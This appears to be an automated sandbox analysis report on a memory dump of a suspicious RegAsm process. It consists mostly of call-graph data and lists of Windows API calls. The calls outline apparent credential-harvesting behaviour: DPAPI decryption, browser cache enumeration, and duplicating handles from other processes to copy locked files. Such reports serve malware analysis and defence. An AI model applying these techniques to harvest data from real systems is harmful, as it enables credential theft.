38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab ??3@YAXPAX ??3@YAXPAX 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab ??3@YAXPAX ??3@YAXPAX 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab ??3@YAXPAX ??3@YAXPAX 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 
38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab ??3@YAXPAX ??3@YAXPAX 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 
API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab ??3@YAXPAX ??3@YAXPAX 38382->38778 38384 40c788 38779 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38779 38386 40c790 38780 40b1ab ??3@YAXPAX ??3@YAXPAX 38386->38780 38388 40c798 38389 40aa04 ??3@YAXPAX 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 
38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 _wcsncoll 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab ??3@YAXPAX ??3@YAXPAX 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 
4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab ??3@YAXPAX ??3@YAXPAX 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 
38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 ??3@YAXPAX 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf ??3@YAXPAX 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab ??3@YAXPAX ??3@YAXPAX 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 
38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 ??3@YAXPAX 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 ??3@YAXPAX 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 
wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 
38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 
38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab ??3@YAXPAX ??3@YAXPAX 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 
38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 ??3@YAXPAX 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab ??3@YAXPAX ??3@YAXPAX 38880->38932 38881->38880 38883 40b633 ??3@YAXPAX 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX ??3@YAXPAX 38916->38917 38918 40e2a4 38917->38918 
38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 ??3@YAXPAX 38923->38925 38926 40aa04 ??3@YAXPAX 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 
                            [Call graph for the preceding function: edge data from the rendered graph, not reproduced]

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            [Control-flow graph of the function at 0040DD85 (basic blocks 40dd85 through 40e01b); rendered graph edge data omitted, see the APIs list below]
                            APIs
                            • memset.MSVCRT ref: 0040DDAD
                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • _wcsicmp.MSVCRT ref: 0040DEB2
                            • _wcsicmp.MSVCRT ref: 0040DEC5
                            • _wcsicmp.MSVCRT ref: 0040DED8
                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                            • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                            • memset.MSVCRT ref: 0040DF5F
                            • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                            • _wcsicmp.MSVCRT ref: 0040DFB2
                            • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                            • API String ID: 2018390131-3398334509
                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                            APIs
                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                              • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                            • String ID:
                            • API String ID: 2947809556-0
                            • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                            • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
